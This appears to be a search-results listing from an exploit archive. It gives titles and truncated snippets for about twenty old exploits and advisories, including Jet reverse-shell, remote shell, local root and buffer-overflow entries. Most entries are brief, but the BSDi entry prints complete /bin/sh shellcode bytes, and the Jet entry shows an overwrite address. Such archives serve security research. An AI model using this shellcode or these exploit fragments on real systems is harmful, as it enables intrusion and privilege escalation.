124 matches found
Fusionphp Fusion News 3.3/3.6 - X-Forworded-For PHP Script Code Injection
source: https://www.securityfocus.com/bid/13661/info FusionPHP Fusion News is prone to a remote PHP code injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. This may facilitate unauthorized access. ? $copyr = " !!! PRIVATE !!! PRIVA...
MS Jet Database (msjet40.dll) Reverse Shell Exploit
Exploit for unknown platform in category local exploits =================================================== MS Jet Database msjet40.dll Reverse Shell Exploit =================================================== Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pears...
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)
Microsoft Jet msjet40.dll Reverse Shell Exploit Based on the exploit written by S.Pearson and Python version by coded by Tal zeltzer XP/sp2 fixed version by Jean Luc import sys import struct Addresses are compatible with Windows XP Service Pack 1 and Service Pack 2 EIP = "\x47\xAD\x05\x30"; Use...
MS Jet Database (msjet40.dll) Reverse Shell Exploit
Exploit for unknown platform in category local exploits =================================================== MS Jet Database msjet40.dll Reverse Shell Exploit =================================================== See-security Technologies ltd. http://www.see-security.com Microsoft Jet msjet40.dll...
AWStats 5.7 6.2 - Multiple Remote s
AWStats 5.7 6.2 - Multiple Remote s / Awstats exploit "shell" code by omin0us omin0us208 at gmail dot com dtors security group .: http://dtors.ath.cx :. Vulnerability reported by iDEFENSE pluginmode bug has been found by GHC team. The awstats exploit that was discovered allows a user to execute...
[EXPL] ELOG Remote Shell Exploit
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
bsdi/x86 execve /bin/sh 45 bytes
No description provided by source. / BSDi execve of /bin/sh by duke [email protected] / char bsdishell= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; milw0rm.com 2004-09-...
gaucho140poc.cpp.txt
// // Gaucho Ver 1.4 Mail Client Buffer Overflow Vulnerability // Bind Shell POC Validation Code for English Win2K SP4 // 10 Aug 2004 // // Gaucho is an Email client developed by NakedSoft for Microsoft Windows // platforms. Gaucho supports SMTP, POP3 and other email delivery protocols. // Gaucho...
Microsoft Internet Explorer - Remote Wscript.Shell
Microsoft Internet Explorer - Remote Wscript.Shell ----------------------------------------------------- default.htm ------------------------------------------------------- function InjectedDuringRedirection...
MS Internet Explorer Remote Application.Shell Exploit
Exploit for unknown platform in category remote exploits ===================================================== MS Internet Explorer Remote Application.Shell Exploit ===================================================== function InjectedDuringRedirection...
Immunity Canvas: PSERVERD
Name| pserverd ---|--- CVE| CVE-2004-0396 Exploit Pack| CANVAS Description| CVS pserverd Notes| CVE Name: CVE-2004-0396 VENDOR: nongnu.org Notes: This overflow impacts CVS feature versions 1.12.7 and earlier, and stable versions 1.11.15 https://vulners.com/cve/CVE-2004-0396. ab note: cvsd running...
kpopup 0.9.x - Privileged Command Execution
// source: https://www.securityfocus.com/bid/8915/info It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is is installed setuid root by default. According to the report, kpopup uses the system3 C-library function insecurely to run other...
ProFTPD Security Advisory
Upgraded ProFTPD packages are available for Slackware 8.1, 9.0 and - -current. These fix a security issue where an attacker could gain a root shell by downloading a specially crafted file. Here are the details from the Slackware 9.0 ChangeLog: Tue Sep 23 14:43:10 PDT 2003...
HP-UX 11.0/11.11 swxxx Local Root Shell Exploit
Exploit for hp-ux platform in category local exploits =============================================== HP-UX 11.0/11.11 swxxx Local Root Shell Exploit =============================================== / Program : xhpux11isw.c Use : HP-UX 11.11/11.0 exploit swxxx to get local root shell. Complie : cc...
Remote Buffer Overflow vulnerability in Lib HTTPd.
======================================== INetCop Security Advisory 2002-0x82-003 ======================================== Title: Remote Buffer Overflow vulnerability in Lib HTTPd. 0x01. Description LibHTTPD can be used to add basic web server capabilities to an application or embedded device...
Microsoft Windows XP/2000/NT 4.0 - Help Facility ActiveX Control Buffer Overflow
// source: https://www.securityfocus.com/bid/5874/info The ActiveX control that provides much of the functionality for the Windows Help Center contains an unchecked buffer. Successful exploitation could result in execution of arbitrary code in the security context of the current user. / By...
[SECURITY] New version of cvsweb released
------------------------------------------------------------------------ Debian Security Advisory [email protected] http://www.debian.org/security/ Wichert Akkerman July 16, 2000 - ------------------------------------------------------------------------ Package: cvsweb Vulnerability type:...
Remote xploit for MDBMS
/ MDBMS V0.96b6 remote shell xploit 11/05/2000 |TDP| [email protected] - HaCk-13 TeaM This code shows a MDBMS v0.96b6 vulnerability in which, any remote user can exec a shell. MDBMS daemon used to be ran as root user; exposing the system to serious vulnerability risks, because any attacker can obtai...
gpm 1.18.11.19 Debian 2.x RedHat 6.x S.u.S.E 5.36.x - gpm Setgid
gpm 1.18.11.19 Debian 2.x RedHat 6.x S.u.S.E 5.36.x - gpm Setgid source: https://www.securityfocus.com/bid/1069/info A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a...
interscan.txt
Date: Mon, 8 Nov 1999 01:50:26 +1300 NZDT From: dark spyrit To: [email protected] Subject: Interscan VirusWall NT 3.23/3.3 buffer overflow. A buffer overflow exists on the VirusWall smtp gateway - by sending a long HELO command you can overflow the buffer and execute arbitrary code. Example...